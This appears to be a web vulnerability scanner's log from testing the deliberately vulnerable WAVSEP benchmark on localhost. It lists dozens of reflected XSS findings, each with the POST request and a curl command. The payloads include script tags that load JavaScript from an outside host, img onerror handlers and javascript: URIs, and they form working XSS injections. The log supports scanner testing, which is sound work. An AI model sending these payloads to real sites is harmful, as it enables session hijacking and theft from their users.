curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp" -d "userinput=String.fromCharCode%280%2Cw4z5fby6kf%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cwfuxr25w8v%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp" -d "userinput=String.fromCharCode%280%2Cwfuxr25w8v%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cwnncx7qz57%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp" -d "userinput=String.fromCharCode%280%2Cwnncx7qz57%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cwx42vb43ab%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp" -d "userinput=String.fromCharCode%280%2Cwx42vb43ab%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cwdm507o346%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp" -d "userinput=String.fromCharCode%280%2Cwdm507o346%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cwvwscwsimb%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp" -d "userinput=String.fromCharCode%280%2Cwvwscwsimb%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cw0qqqnhzjc%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp" -d "userinput=String.fromCharCode%280%2Cw0qqqnhzjc%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cwyl1fx29nt%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp" -d "userinput=String.fromCharCode%280%2Cwyl1fx29nt%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp Content-Type: application/x-www-form-urlencoded userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw0um6aea4zz.js%3E%3C%2Fscript%3E&userinput2=default
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -d "userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw0um6aea4zz.js%3E%3C%2Fscript%3E&userinput2=default"
XSS vulnerability found via injection in the parameter userinput2
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp Content-Type: application/x-www-form-urlencoded userinput=default&userinput2=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2e4yvbh4nz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -d "userinput=default&userinput2=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2e4yvbh4nz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp Content-Type: application/x-www-form-urlencoded userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwm0we3ae3bz.js%3E%3C%2Fscript%3E&__VIEWSTATE=%2FwEPDwUENTM4MWRkhsjF%2B62gWnhYUcEyuRwTHxGDVzA%3D
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp" -d "userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwm0we3ae3bz.js%3E%3C%2Fscript%3E&__VIEWSTATE=%2FwEPDwUENTM4MWRkhsjF%2B62gWnhYUcEyuRwTHxGDVzA%3D"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp Content-Type: application/x-www-form-urlencoded userinput=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wa158noj32%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp" -d "userinput=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wa158noj32%22%29%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case01-Tag2HtmlPageScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case01-Tag2HtmlPageScope.jsp Content-Type: application/x-www-form-urlencoded userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw7xd8ke201z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case01-Tag2HtmlPageScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case01-Tag2HtmlPageScope.jsp" -d "userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw7xd8ke201z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case02-Tag2TagScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case02-Tag2TagScope.jsp Content-Type: application/x-www-form-urlencoded userinput=%3C%2Ftextarea%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3g5544aemz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case02-Tag2TagScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case02-Tag2TagScope.jsp" -d "userinput=%3C%2Ftextarea%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3g5544aemz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case03-Tag2TagStructure.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case03-Tag2TagStructure.jsp Content-Type: application/x-www-form-urlencoded userinput=%22%2F%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9qw9f3pv5z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case03-Tag2TagStructure.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case03-Tag2TagStructure.jsp" -d "userinput=%22%2F%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9qw9f3pv5z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case05-Tag2Frameset.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case05-Tag2Frameset.jsp Content-Type: application/x-www-form-urlencoded userinput=javascript%3AString.fromCharCode%280%2Cwn3kszkq4j%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case05-Tag2Frameset.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case05-Tag2Frameset.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwn3kszkq4j%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case06-Event2TagScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case06-Event2TagScope.jsp Content-Type: application/x-www-form-urlencoded userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22w3wcbcixtn%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case06-Event2TagScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case06-Event2TagScope.jsp" -d "userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22w3wcbcixtn%22%29%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case07-Event2DoubleQuotePropertyScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case07-Event2DoubleQuotePropertyScope.jsp Content-Type: application/x-www-form-urlencoded userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wvcr17j0rp%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case07-Event2DoubleQuotePropertyScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case07-Event2DoubleQuotePropertyScope.jsp" -d "userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wvcr17j0rp%22%29%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case08-Event2SingleQuotePropertyScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case08-Event2SingleQuotePropertyScope.jsp Content-Type: application/x-www-form-urlencoded userinput=%27%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22w6vvlxgjuw%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case08-Event2SingleQuotePropertyScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case08-Event2SingleQuotePropertyScope.jsp" -d "userinput=%27%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22w6vvlxgjuw%22%29%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case09-SrcProperty2TagStructure.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case09-SrcProperty2TagStructure.jsp Content-Type: application/x-www-form-urlencoded userinput=%3E%3C%2Fscript%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwz71y7p8ccz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case09-SrcProperty2TagStructure.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case09-SrcProperty2TagStructure.jsp" -d "userinput=%3E%3C%2Fscript%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwz71y7p8ccz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp Content-Type: application/x-www-form-urlencoded userinput=javascript%3AString.fromCharCode%280%2Cwwv0yu1zre%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwwv0yu1zre%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp Content-Type: application/x-www-form-urlencoded userinput=javascript%3AString.fromCharCode%280%2Cwvanp11dgn%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwvanp11dgn%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case19-Js2PropertyJsScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case19-Js2PropertyJsScope.jsp Content-Type: application/x-www-form-urlencoded userinput=javascript%3AString.fromCharCode%280%2Cwjse8jnuho%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case19-Js2PropertyJsScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case19-Js2PropertyJsScope.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwjse8jnuho%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp Content-Type: application/x-www-form-urlencoded userinput=javascript%3AString.fromCharCode%280%2Cwz1rije7ae%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwz1rije7ae%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case21-Vbs2PropertyVbsScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case21-Vbs2PropertyVbsScope.jsp Content-Type: application/x-www-form-urlencoded userinput=javascript%3AString.fromCharCode%280%2Cw57sdrq2en%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case21-Vbs2PropertyVbsScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case21-Vbs2PropertyVbsScope.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cw57sdrq2en%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cwa3wf6at5n%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp" -d "userinput=String.fromCharCode%280%2Cwa3wf6at5n%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cw9fhgjyyr8%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp" -d "userinput=String.fromCharCode%280%2Cw9fhgjyyr8%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case24-Js2ScriptTag.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case24-Js2ScriptTag.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cwj1rlzky6p%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case24-Js2ScriptTag.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case24-Js2ScriptTag.jsp" -d "userinput=String.fromCharCode%280%2Cwj1rlzky6p%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cwck0lm1fpx%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp" -d "userinput=String.fromCharCode%280%2Cwck0lm1fpx%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case26-Vbs2ScriptTag.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case26-Vbs2ScriptTag.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cwkkft1tnfs%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case26-Vbs2ScriptTag.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case26-Vbs2ScriptTag.jsp" -d "userinput=String.fromCharCode%280%2Cwkkft1tnfs%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case27-Js2ScriptTagOLCommentScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case27-Js2ScriptTagOLCommentScope.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cwl1hj41t49%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case27-Js2ScriptTagOLCommentScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case27-Js2ScriptTagOLCommentScope.jsp" -d "userinput=String.fromCharCode%280%2Cwl1hj41t49%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case28-Js2ScriptTagMLCommentScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case28-Js2ScriptTagMLCommentScope.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cwg2cydeib5%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case28-Js2ScriptTagMLCommentScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case28-Js2ScriptTagMLCommentScope.jsp" -d "userinput=String.fromCharCode%280%2Cwg2cydeib5%2C1%29"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case29-Vbs2ScriptTagOLCommentScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case29-Vbs2ScriptTagOLCommentScope.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cwruhozabwi%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case29-Vbs2ScriptTagOLCommentScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case29-Vbs2ScriptTagOLCommentScope.jsp" -d "userinput=String.fromCharCode%280%2Cwruhozabwi%2C1%29"
XSS vulnerability found via injection in the parameter userinput
